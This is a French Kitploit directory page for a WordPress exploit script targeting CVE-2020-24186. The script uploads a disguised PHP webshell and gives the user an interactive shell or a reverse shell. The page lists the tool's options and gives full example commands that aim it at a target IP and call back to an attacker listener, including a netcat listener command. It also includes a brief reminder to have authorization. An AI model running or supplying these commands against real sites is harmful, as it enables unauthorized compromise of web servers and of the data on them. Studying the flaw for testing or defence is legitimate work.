Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-24186 — Script d'exploitation pour CVE-2020-24186 dans WordPress qui télécharge un webshell PHP camouflé et fournit un accès interactif ou un reverse shell avec automatisation facultative de l'écouteur pwntools. | Kitploit
Outils/GitHubGitHub/gazettel/cve-2020-24186
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubgazettel/cve-2020-24186

CVE-2020-24186

Script d'exploitation pour CVE-2020-24186 dans WordPress qui télécharge un webshell PHP camouflé et fournit un accès interactif ou un reverse shell avec automatisation facultative de l'écouteur pwntools.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-24186

Ce script exploite la vulnérabilité CVE-2020-24186 dans WordPress pour télécharger une charge utile PHP camouflée et obtenir un shell sur le système cible. Il propose trois modes de fonctionnement :

  1. Shell interactif :
    Télécharge le webshell de base et entre en mode interactif, vous permettant d'envoyer des commandes via le paramètre cmd.

  2. Shell inverse manuel :
    Télécharge le webshell et envoie la charge utile du shell inverse, mais ne lance pas automatiquement un écouteur. Vous devez démarrer manuellement votre propre écouteur sur l'IP et le port spécifiés.

  3. Shell inverse avec pwntools :
    Télécharge le webshell, envoie la charge utile du shell inverse, et le script lance automatiquement un écouteur à l'aide de pwntools pour capturer la connexion inverse.

Prérequis

  • Python 3.x
  • Bibliothèques Python :
    • requests
    • pwn (pwntools)
  • (Optionnel) Configuration du proxy si vous voulez router le trafic (par exemple, pour les tests avec Burp Suite).

Options d'utilisation

  • --url : URL de base du site cible (par ex., http://10.10.110.119).
  • --blogpath : Chemin vers l'article (défaut : /?page=1).
  • --mode : Mode de fonctionnement, soit interactive soit reverse.
  • --lhost : IP locale pour le shell inverse (requis en mode reverse).
  • --lport : Port local pour le shell inverse (requis en mode reverse).
  • --reverse_method : Méthode de shell inverse : bash, nc ou python (défaut : bash).
  • --manual : Lorsqu'il est utilisé en mode inverse, le script ne lancera pas l'écouteur ; vous devez démarrer votre propre écouteur manuellement.
  • --use-proxy : Si défini, les requêtes seront envoyées via le proxy configuré.

Exemples

1. Shell interactif

Télécharge un webshell et démarre une session interactive pour envoyer des commandes :

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy

2. Shell inverse en mode manuel

Télécharge le webshell, envoie la charge utile du shell inverse, mais ne démarre pas automatiquement un écouteur. Démarrez votre propre écouteur manuellement (par ex., avec netcat) :

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy

Ensuite, dans un autre terminal, démarrez votre écouteur manuellement :

root@kitploit:~
nc -lvnp 9002

1. Shell inverse avec pwntools

Télécharge le webshell, envoie la charge utile du shell inverse, et le script lance automatiquement un écouteur avec pwntools pour capturer la connexion :

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy

Le script attendra une connexion sur 10.10.1.1:9002 et, une fois connecté, fournira un shell interactif.

Remarques

  • Assurez-vous que le site cible est vulnérable à CVE-2020-24186 et que vous disposez des autorisations nécessaires pour les tests de sécurité.
  • Vous pouvez modifier la charge utile PHP à l'aide de l'option --php_payload si des ajustements sont nécessaires.
  • Vérifiez deux fois les paramètres du proxy si vous utilisez l'option --use-proxy.
Télécharger l’outil